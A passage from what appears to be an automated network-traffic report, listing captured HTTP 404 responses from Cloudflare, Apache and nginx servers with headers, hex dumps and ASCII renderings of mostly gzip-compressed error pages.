cfL4;desc="?proto=TCP&rtt=1650&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=616&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 62 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0d a5 b2 21 b5 93 34 8c 52 ff 80 36 49 59 21 49 cb 96 32 c6 18 45 96 ce b6 8a 22 79 92 92 90 25 fe df 87 ed 34 cd 0a ed d8 07 83 a4 7b ef de dd e9 59 e1 c9 e8 7e 38 ff fe 30 46 9f e7 d3 09 7a 78 bc 99 dc 0d 51 fb dc f7 ef c6 f3 5b df 1f cd 47 4d a4 ef 75 7d 7f 3c 6b c7 ad 30 b7 0b 11 87 39 10 16 b7 42 cb ad 80 78 d0 1d a0 99 b2 e8 56 2d 25 0b fd e6 b0 15 fa 35 28 4c 14 db 54 bc 5e 7c 84 c9 7b 71 2b 2c e2 79 0e 48 c3 af 25 18 0b 0c 3d 7e 99 a0 35 31 48 2a 8b d2 0a 87 94 44 36 e7 06 19 d0 2b d0 5e e8 17 35 ed 9a 31 6e b9 92 44 88 4d 07 11 f4 57 01 2d d0 5a e9 3a 11 48 aa 96 d2 82 06 86 d6 39 17 80 ac de 70 99 21 ab d0 d2 00 22 12 8d 2b f0 48 d1 e5 02 a4 ad ce 73 22 59 05 7c ad 6c 2f 6b a8 e6 85 8d 9d 74 29 69 25 ee b8 db 97 25 a2 8e bb 5d 11 8d 92 88 78 54 49 0b d2 be e4 dc ed 0e 47 df b8 64 6a ed b1 7d 24 e0 a9 93 34 3c 16 25 1e d5 40 2c 8c 05 54 31 07 37 72 d8 0d 98 c7 a5 04 5d dd 43 d4 5e 37 29 9e 9e 86 b7 a7 74 75 5a 10 4d 16 26 da ea 2b 7c 09 9f 7a d0 bf ec f7 69 37 19 5c f4 2e 70 c7 5e e1 e9 9c fe 9e 3e df ad 67 23 da 9d 0d 07 eb e9 e8 ba fa 22 5c 06 95 2c 89 5e 6a 79 57 9d 78 52 49 0a 11 c6 01 f1 8c a6 11 f6 29 93 e7 34 e3 3e cd 89 10 20 33 38 2f 04 b1 a9 d2 0b bf a1 19 ff d9 30 7f 41 b8 f4 9e 0d 0e 0e 1a 19 Data Ascii: 2b2Tk0B!4R6IY!I2E"y%4{Y~80FzxQ[GMu}<k09BxV-%5(LT^|{q+,yH%=~51H*D6+^51nDMW-Z:H9p!"+Hs"Y|l/kt)i%%]xTIGdj}$4<%@,T17r]C^7)tuZM&+|zi7\.p^>g#"\,^jyWxRI)4> 38/0A
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:59:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bz5lz5U%2BoHfGefslxCrwUDyM6aOLgY2LAdFLIttB0d1iU6pvuSri3BxlIat0HnNednHqpUa%2BQ6%2FhCRXpejeo8E%2BFUo6Kcl3mq17PkuWjvKdAof%2B02Xclh8a3q0P7D4agP01RHz6SKA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61e292eb705e5f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1670&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=636&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 62 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 6b 6b db 30 14 fd 9e 5f a1 86 52 c9 90 5a 49 69 f7 a8 1f d0 25 29 2b 24 69 d9 52 c6 18 a3 c8 d2 75 ac e2 48 9e a4 24 64 89 ff fb b0 9d a6 59 a1 1d fb 60 90 74 cf b9 e7 de ab 63 85 47 83 db fe f4 fb dd 10 7d 9e 8e 47 e8 ee fe d3 e8 a6 8f da a7 94 de 0c a7 d7 94 0e a6 83 26 72 e6 77 29 1d 4e da 71 2b cc dc 3c 8f c3 0c 98 88 5b a1 93 2e 87 f8 bc 7b 8e 26 da a1 6b bd 50 22 a4 cd 61 2b a4 35 28 4c b4 58 57 bc 5e 7c 80 c9 7a 71 2b 2c e2 69 06 c8 c0 af 05 58 07 02 dd 7f 19 a1 15 b3 48 69 87 d2 0a 87 b4 42 2e 93 16 59 30 4b 30 7e 48 8b 9a 76 25 84 74 52 2b 96 e7 eb 0e 62 e8 af 02 5a 60 8c 36 75 22 50 5c 2f 94 03 03 02 ad 32 99 03 72 66 2d d5 0c 39 8d 16 16 10 53 68 58 81 07 9a 2f e6 a0 5c 75 9e 31 25 2a e0 73 65 3b 59 cb 8d 2c 5c 4c d2 85 e2 95 38 f1 36 4f 4b c4 89 b7 59 32 83 92 88 f9 5c 2b 07 ca 3d e5 dc 6e f7 47 df a4 12 7a e5 8b 5d 24 90 29 49 1a 9e 88 12 9f 1b 60 0e 86 39 54 31 82 1b 39 ec 05 c2 97 4a 81 a9 ee 21 6a af 9a 14 0f 0f fd eb 63 be 3c 2e 98 61 73 1b 6d cc 25 fe 00 ef 7a 70 f6 f1 0c 92 f7 dd 0b b8 48 71 c7 5d e2 f1 94 ff 1e 3f de ac 26 03 de 9d c8 f3 d5 78 70 55 7d 11 2e 83 4a 96 45 4f b5 bc aa ce 7c a5 15 87 08 e3 80 f9 d6 f0 08 53 2e d4 29 9f 49 ca 33 96 e7 a0 66 70 5a e4 cc a5 da cc 69 43 b3 f4 d1 0a 3a 67 52 f9 8f 16 Data Ascii: 2b2Tkk0_RZIi%)+$iRuH$dY`tcG}G&rw)Nq+<[.{&kP"a+5(LXW^|zq+,iXHiB.Y0K0~Hv%tR+bZ`6u"P\/2rf-9ShX/\u1%*se;Y,\L86OKY2\+=nGz]$)I`9T19J!jc<.asm%zpHq]?&xpU}.JEO|S.)I3fpZiC:gR
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:59:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XxhgxXdp4cd95LWHELAj%2BAfICjzUb8CALoysjzZQc30nW3KH0KnPZcCdjFo8IyMD56Ac8glJ%2Fm%2F%2BtfDy8SqIMKYuqo%2Fs6yQqy7lO35tgxulIdiu0fofhdcrxfxXiAUwjZNUFQLDsRA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61e2a38fc580e0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1601&sent=3&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10718&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0b a5 92 21 b5 92 ae 1b a5 fe 01 6d 92 b2 42 92 96 35 65 8c 31 8a 2c 9d 63 15 47 f2 24 25 21 4b fc bf 0f db 69 9a 15 da b1 0f 06 49 f7 de bd bb d3 b3 c2 0f 83 db fe f4 fb dd 10 7d 99 8e 47 e8 ee e1 6a 74 d3 47 ed 13 4a 6f 86 d3 6b 4a 07 d3 41 13 39 f5 bb 94 0e 27 ed b8 15 66 6e 9e c7 61 06 4c c4 ad d0 49 97 43 7c d6 3d 43 13 ed d0 b5 5e 28 11 d2 e6 b0 15 d2 1a 14 26 5a ac 2b 5e 2f 3e c0 64 bd b8 15 16 f1 34 03 64 e0 d7 02 ac 03 81 1e be 8e d0 8a 59 a4 b4 43 69 85 43 5a 21 97 49 8b 2c 98 25 18 3f a4 45 4d bb 14 42 3a a9 15 cb f3 75 07 31 f4 57 01 2d 30 46 9b 3a 11 28 ae 17 ca 81 01 81 56 99 cc 01 39 b3 96 6a 86 9c 46 0b 0b 88 29 34 ac c0 03 cd 17 73 50 ae 3a cf 98 12 15 f0 a5 b2 9d ac e5 46 16 2e 26 e9 42 f1 4a 9c 78 9b e7 25 e2 c4 db 2c 99 41 49 c4 7c ae 95 03 e5 9e 73 6e b7 fb a3 6f 52 09 bd f2 c5 2e 12 c8 94 24 0d 4f 44 89 cf 0d 30 07 c3 1c aa 18 c1 8d 1c f6 02 e1 4b a5 c0 54 f7 10 b5 57 4d 8a c7 c7 fe f5 11 5f 1e 15 cc b0 b9 8d 36 e6 02 9f c3 e7 1e 9c b2 8f e7 29 ff 74 de 85 2e ee b8 0b 3c 9e f2 df e3 a7 9b d5 64 c0 bb b7 f7 67 ab f1 e0 b2 fa 22 5c 06 95 2c 8b 9e 6b 79 53 9d f9 4a 2b 0e 11 c6 01 f3 ad e1 11 a6 5c a8 13 3e 93 94 67 2c cf 41 cd e0 a4 c8 99 4b b5 99 d3 86 66 e9 93 15 74 ce a4 f2 9f Data Ascii: 2a7Tk0B!mB5e1,cG$%!KiI}GjtGJokJA9'fnaLIC|=C^(&Z+^/>d4dYCiCZ!I,%?EMB:u1W-0F:(V9jF)4sP:F.&BJx%,AI|snoR.$OD0KTWM_6)t.<dg"\,kySJ+\>g,AKft
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:59:12 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CAbyanZzW%2Ft3Z7dGXO6uSFuv6sk238JP421QxdPAycmJ%2BC3Yo3H9Lo5z%2B6FiM0%2BbYfdkC4i2o5RlAX11GyFERjqY0%2FteMyiQjTs72Qw7zUTJLLYoNV78aBlDpMc2ultytAsSwfxAXg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e61e2b40e1a41ad-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1689&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=350&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d Data Ascii: 4e5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$param
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:59:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:59:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:59:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:59:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 15:59:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 15:59:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 